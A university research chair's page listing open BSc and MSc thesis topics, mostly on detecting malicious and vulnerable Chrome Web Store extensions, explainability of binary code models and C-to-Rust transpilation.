Chair of Programming Languages and AI
print


Breadcrumb Navigation


Content

BSc/MSc Theses

This is a (non-exclusive) list of thesis topics currently offered at PLAI. Additionally, other related topics may be available.

Please contact the mentioned person with a transcript of record and highlight all relevant experience related to the topic you are interested in for a BSc or MSc thesis. Also, please take note of the languages the person speaks.

Open

  • MSc
    Malware detection in the CWS using Code Similarity

    Motivation Browser extensions enhance user experience by adding functionality to web browsers, but they also present significant security risks. With access to sensitive data and system resources, extensions can become vectors for malicious activities, such as data theft, privacy invasion, and unauthorized actions. In recent years, the security of browser extensions has become a growing concern due to their increasing prevalence and capability.

    Code similarity measures how closely two pieces of source code resemble each other in structure, syntax, or behavior. It can be analyzed using various techniques, including syntactic (token-based, tree-based), semantic (execution-based, embedding models), and hybrid approaches. Applications include detecting plagiarism, identifying code clones, and clustering similar malware samples.

    Your Part Use recently detected malicious browser extensions to find further malware samples. We want a fully automatic approach that could be applied iteratively on this ecosystem.

    Prerequisites Strong JavaScript and HTML knowledge is required for this topic.

    Related Work Did I Vet You Before? Assessing the Chrome Web Store Vetting Process through Browser Extension Similarity

  • MSc
    Vulnerability Detection in CWS using CodeQL

    Motivation Browser extensions enhance user experience by adding functionality to web browsers, but they also present significant security risks. With access to sensitive data and system resources, extensions can become vectors for malicious activities, such as data theft, privacy invasion, and unauthorized actions. In recent years, the security of browser extensions has become a growing concern due to their increasing prevalence and capability.

    CodeQL is a static analysis tool that models code as a queryable database, allowing users to write custom queries to detect security vulnerabilities and code quality issues. It is widely used for identifying common software weaknesses, such as injection flaws and insecure dependencies, by analyzing source code, dependencies, and data flows. As a vulnerability detector, CodeQL enables security researchers and developers to automate security audits, detect zero-day vulnerabilities, and enforce secure coding practices across large codebases.

    Your Part Use CodeQL to detect security vulnerabilities in Chrome Web Store extensions by analyzing their source code and identifying common weaknesses. The findings will be compared to the current state-of-the-art tools, DoubleX and CoCo, to evaluate CodeQL's effectiveness in detecting malicious or insecure behavior. This comparison will assess detection accuracy, coverage, and false positive rates, providing insights into CodeQL's strengths and limitations for browser extension security analysis.

    Prerequisites

    • Strong JavaScript and HTML knowledge is required for this topic.
    • Understanding of browser extensions functionality.
    • Knowledge about dataflow analysis.

    Related Work

  • BSc
    Information-theoretic/Statistical Analysis of Explainability in Binary Code Embedding Models

    Application: Please write a short email describing your interests and strengths and attach a transcript of records (incl. bachelor grades). Long walls of text and Chat-GPT generated emails will be ignored without further consideration.

    Motivation

    • Deep Learning models have become increasingly popular in the area of binary code analysis
    • Explainable AI (XAI) methods help us to understand why the DL models work
    • State-of-the-art models rely on the co-occurence of assembly instruction tokens

    Your Part

    • Conduct a explanatory data analysis (EDA) on our binary code dataset
    • Analyze relationships and possible correlations of frequency of specific instructions with their corresponding saliencies ("importance")
    • An information-theoretic analysis would try to reason from entropy of specific instructions' occurence

    Prerequisites

    • Excellent academic track record
    • Practical experience using machine learning techniques
    • Basic knowledge or interest in binary code and/or software security
    • Strong background in statistics/statistical methods and/or background in information theory (entropy)

    Related Work

    • Moritz Dannehl, Samuel Valenzuela, and Johannes Kinder. Which Instructions Matter the Most: A Saliency Analysis of Binary Function Embedding Models. In Proc. IEEE Symp. Security and Privacy Workshops (SPW), Deep Learning Security and Privacy Workshop (DLSP), IEEE, 2025.
  • MSc
    Comparison of Explainability Methods for Deep Learning-Based Binary Code Models

    Motivation

    • Deep learning models have become increasingly popular in the area of binary code analysis
    • However, little work has been done to investigate the behavior of those models
    • Recently, our research group took a first step in this direction and analyzed state-of-the-art models by masking individual instructions in the binary code and determining which instructions impact the models' output the most
    • Many opportunities remain to introduce explainability to this field

    Your Part

    • Expand the explainability analyses of the state-of-the-art models by researching, adapting, and applying explainability techniques to an existing dataset of binary functions
    • Conduct exploratory and systematic analyses to compare the results between the explainability techniques and evaluate the suitability of different methods in this domain

    Prerequisites

    • Excellent academic track record
    • Practical experience using machine learning techniques
    • Basic knowledge or interest in binary code and/or software security

    Related Work

    • Moritz Dannehl, Samuel Valenzuela, and Johannes Kinder. Which Instructions Matter the Most: A Saliency Analysis of Binary Function Embedding Models. In Proc. IEEE Symp. Security and Privacy Workshops (SPW), Deep Learning Security and Privacy Workshop (DLSP), IEEE, 2025.
  • MSc
    Building a Cross-Architecture Testsuite for ARM32 binary patches
  • MSc
    Replicate results from research done for CWS - Hulk

    Motivation Browser extensions enhance user experience by adding functionality to web browsers, but they also present significant security risks. With access to sensitive data and system resources, extensions can become vectors for malicious activities, such as data theft, privacy invasion, and unauthorized actions. In recent years, the security of browser extensions has become a growing concern due to their increasing prevalence and capability.

    The paper Hulk: Eliciting Malicious Behavior in Browser Extensions presents a system that dynamically analyzes Chrome extensions by interacting with them in an instrumented environment to detect malicious behaviors, such as ad injection, credential theft, and code obfuscation. By executing extensions in a controlled setting and monitoring their network activity, DOM modifications, and API calls, Hulk identifies patterns of malicious behavior, uncovering previously undetected malware in the Chrome Web Store. The study highlights the widespread presence of malicious extensions and the challenges in securing browser ecosystems.

    Your Part Repeat the experiments done for the paper in the current state of the Chrome Web Store. We want to leverage their system for malware detection and validate if their claims still hold in this ecosystem.

    Prerequisites

    • Strong JavaScript and HTML knowledge is required for this topic.
    • Understanding of browser extensions functionality.
    • Knowledge about fuzzing.

    Related Work Hulk: Eliciting Malicious Behavior in Browser Extensions

  • MSc
    A Study of Data Collection in the CWS

    Motivation Browser extensions enhance user experience by adding functionality to web browsers, but they also present significant security risks. With access to sensitive data and system resources, extensions can become vectors for malicious activities, such as data theft, privacy invasion, and unauthorized actions. In recent years, the security of browser extensions has become a growing concern due to their increasing prevalence and capability.

    The paper Detection of Inconsistencies in Privacy Practices of Browser Extensions investigates how browser extensions handle user data and whether their behaviors align with their stated privacy policies. The authors develop an analysis framework to compare declared permissions, privacy policies, and actual data access patterns, uncovering discrepancies that indicate potential privacy violations. Their findings reveal that many extensions request excessive permissions or secretly leak user data, emphasizing the need for stricter enforcement of privacy policies in extension stores.

    Your Part Using the paper as inspiration, we want to study the collection of data types that were not covered in recent research. To list a few examples, - Personal Identifiable Information - Health Information - Financial & Payment Information - Authentication Information - Personal Communications Your experiments will be done in the current state of the Chrome Web Store.

    Prerequisites

    • Strong JavaScript and HTML knowledge is required for this topic.
    • Understanding of browser extensions functionality.
    • Interest in privacy.

    Related Work Detection of Inconsistencies in Privacy Practices of Browser Extensions

  • MSc
    Replicate results from research done for CWS - You've Changed

    Motivation Browser extensions enhance user experience by adding functionality to web browsers, but they also present significant security risks. With access to sensitive data and system resources, extensions can become vectors for malicious activities, such as data theft, privacy invasion, and unauthorized actions. In recent years, the security of browser extensions has become a growing concern due to their increasing prevalence and capability.

    The paper You've Changed: Detecting Malicious Browser Extensions analyzes how benign Chrome extensions turn malicious after being updated. The authors propose a system that tracks extension updates and detects suspicious changes in permissions, network behavior, and injected scripts. Their findings show that many extensions become harmful post-installation, highlighting the need for stricter vetting and continuous monitoring in browser extension ecosystems.

    Your Part Repeat the experiments done for the paper in the current state of the Chrome Web Store. We want to leverage their system for malware detection and validate if their claims still hold in this ecosystem.

    Prerequisites

    • Strong JavaScript and HTML knowledge is required for this topic.
    • Understanding of browser extensions functionality.
    • Interest in differential analysis.

    Related Work You’ve Changed: Detecting Malicious Browser Extensions

  • BSc/MSc
    Code Optimizations For Demand-Driven Vulnerability Scanning Of Bytecode

    Motivation Vulnerability scanners often work on an intermediate representation (IR) because source code is too ambiguous or not available and bytecode is too complex (200+ instructions; keeping track of the stack). To get the intermediate representation, the tool converts the bytecode to the easy-to-analyze IR and employs classical compiler optimizations during that step. However, an optimized IR is not necessarily the fastest one to analyze and choosing the right order of optimizations is also non trivial ("phase-ordering-problem").

    Your Part You will investigate the effects of different optimizations and code structures on the runtime of demand-driven vulnerability scanners. For that, 1) you need to identify (with my help) beneficial code structures for demand-driven analyses and then 2) think about how to optimize the code in such a way that these code structures appear more often. Further, we could also look at the problem at a more fundamental level and investigate whether more fine-granular variable lifetimes (c.f. non-lexical lifetimes in Rust's IR) increase the performance of the analysis.

    Prerequisites

    • You will have to interact with a large Java codebase and analyze Java applications, therefore being fluent in Java is a requirement
    • Some basic knowledge about compilers or static analysis in beneficial
  • MSc
    Replicate results from research done for CWS - Expector

    Motivation Browser extensions enhance user experience by adding functionality to web browsers, but they also present significant security risks. With access to sensitive data and system resources, extensions can become vectors for malicious activities, such as data theft, privacy invasion, and unauthorized actions. In recent years, the security of browser extensions has become a growing concern due to their increasing prevalence and capability.

    The paper Understanding Malvertising Through Ad-Injecting Browser Extensions analyzes ad-injecting browser extensions to understand their ecosystem, revenue models, and impact on users. The authors study a dataset of extensions that modify webpages by injecting ads, revealing how they hijack legitimate traffic, evade detection, and sometimes distribute malware. Their findings highlight the scale of ad injection, its financial incentives, and the security risks posed by such extensions.

    Your Part Repeat the experiments done for the paper in the current state of the Chrome Web Store. We want to leverage their system for malware detection and validate if their claims still hold in this ecosystem.

    Prerequisites

    • Strong JavaScript and HTML knowledge is required for this topic.
    • Understanding of browser extensions functionality.
    • Knowledge about malvertising.

    Related Work Understanding Malvertising Through Ad-Injecting Browser Extensions

  • MSc
    Detecting clones in the CWS - Analysis of Imitation Attacks

    Motivation Browser extensions enhance user experience by adding functionality to web browsers, but they also present significant security risks. With access to sensitive data and system resources, extensions can become vectors for malicious activities, such as data theft, privacy invasion, and unauthorized actions. In recent years, the security of browser extensions has become a growing concern due to their increasing prevalence and capability.

    The Chrome Web Store contains many extensions that mimic popular ones in name, appearance, and functionality, tricking users into installing them by mistake. These clone extensions often introduce security risks, such as injecting ads, stealing user data, or executing malicious code. The lack of rigorous vetting and automated detection mechanisms allows attackers to exploit user trust and distribute harmful software.

    Your Part Analyze extensions in the Chrome Web Store to identify clones of popular extensions. Develop an approach to detect imitation attempts based on code similarity, metadata, and/or behavior. The solution should scale to continuously monitor and flag potential security risks.

    Prerequisites Strong JavaScript and HTML knowledge is required for this topic.

    Related Work What is in the Chrome Web Store? Investigating Security-Noteworthy Browser Extensions

  • BSc
    Replicate results from research done for CWS - CoCo

    Motivation Browser extensions enhance user experience by adding functionality to web browsers, but they also present significant security risks. With access to sensitive data and system resources, extensions can become vectors for malicious activities, such as data theft, privacy invasion, and unauthorized actions. In recent years, the security of browser extensions has become a growing concern due to their increasing prevalence and capability.

    The paper CoCo: Efficient Browser Extension Vulnerability Detection via Coverage-guided, Concurrent Abstract Interpretation introduces CoCo, a novel framework designed to detect privilege escalation vulnerabilities in browser extensions. By employing coverage-guided, concurrent abstract interpretation, CoCo effectively handles dynamic JavaScript features and scalability challenges, enabling efficient analysis of complex browser extensions. The framework’s efficacy is demonstrated through the detection of over 40 exploitable, manually verified extension vulnerabilities that were previously undetected by other services.

    Your Part Repeat the experiments done for the paper in the current state of the Chrome Web Store. We want to validate if their claims still hold in this ecosystem.

    Prerequisites Strong JavaScript and HTML knowledge is required for this topic.

    Related Work CoCo: Efficient Browser Extension Vulnerability Detection via Coverage-guided, Concurrent Abstract Interpretation

  • MSc
    Vulnerability Detection in IoT-Firmware binaries
  • BSc
    Replicate results from research done for CWS - Hardening the Security Analysis

    Motivation Browser extensions enhance user experience by adding functionality to web browsers, but they also present significant security risks. With access to sensitive data and system resources, extensions can become vectors for malicious activities, such as data theft, privacy invasion, and unauthorized actions. In recent years, the security of browser extensions has become a growing concern due to their increasing prevalence and capability.

    The paper Hardening the Security Analysis of Browser Extensions conducts a systematic study of attack entry points within the browser extension ecosystem, identifying both known and novel vulnerabilities such as password theft, traffic interception, and inter-extension attacks. By analyzing the interactions between extensions, browsers, and web applications, the authors propose a comprehensive approach to enhance security analysis, combining static and dynamic methods to detect insecure extensions and, in some cases, synthesize attack payloads. Their evaluation, which involved downloading and examining 133,365 extensions from the Chrome Web Store, underscores the necessity for a more robust threat model to effectively mitigate these security risks.

    Your Part Repeat the experiments done for the paper in the current state of the Chrome Web Store. We want to validate if their claims still hold in this ecosystem.

    Prerequisites Strong JavaScript and HTML knowledge is required for this topic.

    Related Work Hardening the Security Analysis of Browser Extensions

  • BSc/MSc
    Black Box Evasion Attacks on Binary Code Embedding Models

    Application: Please write a short email describing your interests and strengths and attach a transcript of records (incl. bachelor grades). Long walls of text and Chat-GPT generated emails will be ignored without further consideration.

    Motivation

    • Deep learning models are susceptible for adversarial attacks, i.e. perturbating the input to the model in order to change the output. This is an increasing problem, especially in security related domains, e.g. facial recognition
    • Deep learning models have become increasingly popular in the area of binary code analysis
    • Those models can be used for malware analysis, thus attackers may want to evade detection

    Your Part

    • Define the exact adversarial setting and threat model
    • Conduct literature research about current state of the art
    • Generate adversarial examples, analyze the model's weaknesses, and/or explore possible hardening/defense techniques

    Prerequisites

    • Excellent academic track record
    • Practical experience using machine learning techniques
    • Strong mathematical background
    • Basic knowledge or interest in binary code and/or software security

    Related Work

    • Capozzi, Gianluca, et al. "Adversarial attacks against binary similarity systems." IEEE Access (2024).
    • Aryal, Kshitiz, et al. "A survey on adversarial attacks for malware analysis." IEEE Access (2024).
  • BSc
    Replicate results from research done for CWS - No Signal Left to Chance

    Motivation Browser extensions enhance user experience by adding functionality to web browsers, but they also present significant security risks. With access to sensitive data and system resources, extensions can become vectors for malicious activities, such as data theft, privacy invasion, and unauthorized actions. In recent years, the security of browser extensions has become a growing concern due to their increasing prevalence and capability.

    The paper No Signal Left to Chance: Driving Browser Extension Analysis by Download Patterns investigates the use of download patterns as a signal for analyzing browser extensions. By leveraging machine learning to cluster extensions based on their download behaviors, the study identifies groups of extensions with similar patterns, some of which are associated with malicious activity. The authors demonstrate that analyzing these patterns can effectively detect malicious extensions, enhancing security measures in browser ecosystems.

    Your Part Repeat the experiments done for the paper in the current state of the Chrome Web Store. We want to validate if their claims still hold in this ecosystem.

    Prerequisites Strong JavaScript and HTML knowledge is required for this topic.

    Related Work No Signal Left to Chance: Driving Browser Extension Analysis by Download Patterns

  • MSc
    A Study on Search Abuse in the CWS

    Motivation Browser extensions enhance user experience by adding functionality to web browsers, but they also present significant security risks. With access to sensitive data and system resources, extensions can become vectors for malicious activities, such as data theft, privacy invasion, and unauthorized actions. In recent years, the security of browser extensions has become a growing concern due to their increasing prevalence and capability.

    In the article How extensions trick CWS search from Almost Secure, the author examines how certain browser extensions manipulate the Chrome Web Store's search functionality to gain higher visibility. Developers exploit the multilingual support of CWS by inserting unrelated keywords, including competitors' names, into the descriptions of less commonly used languages. This tactic causes their extensions to appear in search results for terms they wouldn't typically be associated with, leading to misleading and spammy search outcomes.

    Your Part Investigate this kind of abuse in the CWS by leveraging NLP techniques. Your experiments will be done in the current state of the Chrome Web Store.

    Prerequisites

    • Strong JavaScript and HTML knowledge is required for this topic.
    • Understanding of browser extensions functionality.
    • Interest in NLP.

    Related Work Almost Secure

  • MSc
    Behavior Profiling of Browser Extensions

    Motivation Browser extensions enhance user experience by adding functionality to web browsers, but they also present significant security risks. With access to sensitive data and system resources, extensions can become vectors for malicious activities, such as data theft, privacy invasion, and unauthorized actions. In recent years, the security of browser extensions has become a growing concern due to their increasing prevalence and capability.

    This topic focuses on analyzing updates in Chrome Web Store extensions by applying CodeQL queries to detect behavioral changes. The goal is to automatically identify modifications in network communication, API usage, and data access patterns, highlighting potential security and privacy risks. By systematically comparing extension versions, the analysis aims to provide structured insights into how their behavior evolves over time.

    Your Part

    1. Identify Key Behaviors to Monitor – Create a dataset that highlights the behaviors of interest for tracking updates, such as network requests, data access, and permissions.
    2. Define CodeQL Queries – Develop specific CodeQL queries tailored to detect the behaviors outlined in the dataset.
    3. Generate Reports from Results – Process the query results to generate a detailed report on the identified changes in extension behavior.
    4. Analyze Behavioral Changes Over Time – Investigate how the behavior of extensions evolves through multiple updates, identifying patterns or emerging trends.

    Prerequisites

    • Strong JavaScript and HTML knowledge is required for this topic.
    • Understanding of browser extensions functionality.
    • Knowledge about dataflow analysis.

    Related Work Differential Static Analysis for Detecting Malicious Updates to Open Source Packages

  • MSc
    ML-based Transpilation from C to Rust

    Application: Please write an email describing your relevant experiences and attach a CV, you transcript of records (incl. bachelor grades), and a writing sample

    Motivation

    • Rust is a modern programming language with advantages in memory-safety. However re-writing existing code bases is too expensive for certain companies.
    • We are researching ML-based methods to support automatic translation ("transpilation")

    Your Part

    • Based on Facebook's TransCoder Model implementation, re-train the model for transpiling code snippets from C to Rust, e.g. using datasets like Rosetta-Code
    • Evaluate its performance based on the size of the input C code and context

    Prerequisites

    • Basic knowledge in transformer architectures and training
    • Basic knowledge of C and Rust semantics
  • BSc/MSc
    Automatic Modularization of Software Projects for LLM-based Transpilation

    Application: Please write an email describing your relevant experiences and attach a CV, you transcript of records (incl. bachelor grades), and a writing sample

    Motivation

    • With the help of LLMs more tools are developed for transpiling software from old programming languages to new languages, e.g. C to Rust transpilation
    • However, most of the LLM-based research prototypes only operate on Code Snippets, because their context size is too small

    Your Part

    • Given an arbitrary context size limitation of an LLM ($n$ number of characters), implement an algorithm to split up the code base into small chunks of transpilable code snippets, e.g. by calculating a call graph and identifying strongly connected components between the functions in the program.
    • Challenge: How to split up the code base arbitrarly small chunks but ensure that each chunk is still compilable.

    Prerequisites

    • Basic principles of Software Engineering
    • Experience with the C programming language
    • Lecture "Program Analysis for Security" or "Compiler-Design"
  • Project
    CI-Pipeline for a binary patching tool

    We are looking for a student to help develop a continuous integration (CI) pipeline for a binary patching tool. The project involves automating the build, test, and deployment processes to ensure reliability and efficiency.

    Prerequisites

    Strong Python skills, Comfortable with Bash scripting on Linux

  • BSc
    Finding Safe Rust Replacements for C Libraries

    Application: Please write an email describing your relevant experiences and attach a CV, you transcript of records (incl. bachelor grades), and a writing sample

    Motivation

    • Rust is a modern programming language which shows strong performance with improved security. However re-writing existing code bases is too expensive.
    • To make widespread reuse existing Rust libraries, we want to build an index of Rust libraries from https://crates.io/ can act as replacements for widespread C libraries, e.g. the image library as replacement for libpng
    • This way, all C applications that depend on libpng might be made a little bit safer by swapping out libpng for Rusts "image" library

    Your Part

    • Use a combination of LLMs and deterministic methods to implement a search for potential Rust replacements for a given C library.
    • By iterating this search over multiple popular C libraries, build an index of potential Rust Replacements
    • If possible, not only search for functionally equivalent Rust libraries but also assess other properties that would simplify the developers' work in the replacing process, e.g. potential API compatibility, build system compatibility, risk of including unstable 3rd party dependencies (see: https://tweedegolf.nl/en/blog/119/sudo-rs-depencencies-when-less-is-better)
    • As a case study, take an example C application and one of its libraries with an adequate Rust replacement and evaluate the results for equivalence and performance.
  • BSc/Project
    Disk-Assisted Vulnerability Scanning

    Motivation When designing static vulnerability scanners, the goal is to minimize false positives while still identifying non-trivial data flows and scaling to real-world apps. IFDS-based algorithms have proven to be very useful, but they still require hundreds of gigabytes of RAM to analyze particularly complex apps. To still be able to run the analysis in more resource-constrained settings such as developer workstations, researchers have proposed to swap out less used data to the disk.

    Your Part The research group is notorious for providing unreusable artifacts, i.e., only publishing binary blobs. We want to make an open-source implementation available. If done as a bachelor's thesis, you will additionally empirically evaluate your implementation and think about further improvements.

    Prerequisites You will be implementing the solution on top of a large Java codebase, so proficiency in Java is benefical.

    Related Work Scaling Up the IFDS Algorithm with Efficient Disk-Assisted Computing

  • MSc
    Searching for vulnerabilities in Java/Android binaries with CodeQL

    Motivation CodeQL by GitHub is the industry-leading semantic code analysis engine, which allows you to query your code as if it was a SQL database. This can be extremely useful to find security vulnerabilities in real-world code and the standard library already contains queries for all the typical security vulnerabilities. However, the main limitation is that you need (compilable) source code of the application to build the database and, therefore, out-of-the-box CodeQL can not be used to scan third-party applications or dependencies, where no source code is available.
    Currently, the only way to analyze binaries with CodeQL is to use a decompiler and hope that the output is compilable.

    Your Part CodeQL builds the database representation from the AST and its representation is a middle-ground between the AST and bytecode. Our goal is to be able to translate Java and Android binaries to the CodeQL representation without requiring a full-blown decompiler.

    During the thesis, you will deep-dive into Java/Android decompilation techniques and build your own decompiler that is able to decompile Java and/or Android binaries into CodeQL's representation. You will also learn a bit of reverse engineering, because most of the inner workings of CodeQL are not documented.

    Prerequisites A small prototype exists to prove the feasibility of this topic, which is written in Rust. It's up to you whether you want to build upon it or start from scratch.

  • MSc
    Lifting Cooperative Taint Analysis

    Motivation Taint analysis is a fundamental dataflow problem that can be used to identify security vulnerabilities such as SQL injections, XSS, insecure deserialization and many others. To be useful and not overwhelm the user with too many false positives, the state-of-the-art uses precise heap abstractions such as access graphs or access paths. You can think of an access path as a variable in the code and a chain of field references with a maximum length of k. These heap abstractions are additionally enriched with type information and other metadata.
    One algorithm to solve these dataflow problems is IFDS. Especially the ability to solve two dependent problems in cooperation, i.e. resolving aliases on-demand for the taint analysis, allows IFDS-based taint analysis to discover non-trivial dataflows while still being reasonable precise. However, IFDS has a worst-time complexity of O(|E| |D|^3) with D being the domain and the access path domain can grow quite large, making it impossible to analyze complex applications in a reasonable timeframe.
    IDE is a generalization of IFDS, originally developed to solve map domains such as constant propagation (Var -> Value), and allows to split up a powerset domain into a dataflow domain and a value domain. The time complexity of IDE is the same as for IFDS.
    A recent paper (Oct 2024) shows that it is possible to split up the access path heap model into a dataflow domain of local variables and a value domain of field (de-)references, leading to speedups of average 200x(!) compared to the equivalent IFDS formulation. Besides them basing their work on an artefact from 2016 and not publishing their code, they also consider alias analysis orthogonal to the taint analysis problem and use a previously published alias analysis still operating on an expensive access graph domain to resolve the aliases.

    Your Part First, we want to reproduce the work based on an up-to-date version of Soot and FlowDroid, because we are highly interested in open-sourcing the more scalable analysis. Second, we have the idea of a cooperative alias analysis in IDE. IDE's phase 1 is basically IFDS, so we do think it is possible to exchange dataflow facts in phase 1. Also, FlowDroid's call site matching during the path building stage has already proven that you can solve a context-free language across different analysis directions. Thus, the research question is whether it is possible to extend the CFL grammar aka the value domain to also solve aliases on-demand and asynchronously with multiple IDE solvers as it is done with IFDS. To the best of our knowledge, there isn't yet any paper that uses multiple IDE solvers in cooperation, so this is actually something completly new to work on!

    Prerequisites

    • You will be implementing the solution on top of a large Java codebase, so proficiency in Java is benefical.
    • Furthermore, this topic requires you to design a complex static analysis that is supposed to analyze real-world Java applications, which requires good knowledge about the Java language semantics.
    • Knowledge about static analysis and context-free languages obtained from courses like Principles of Compiler Design or Program Analysis for Security is also beneficial.

    Related Work

In Progress



Last update 02.04.2025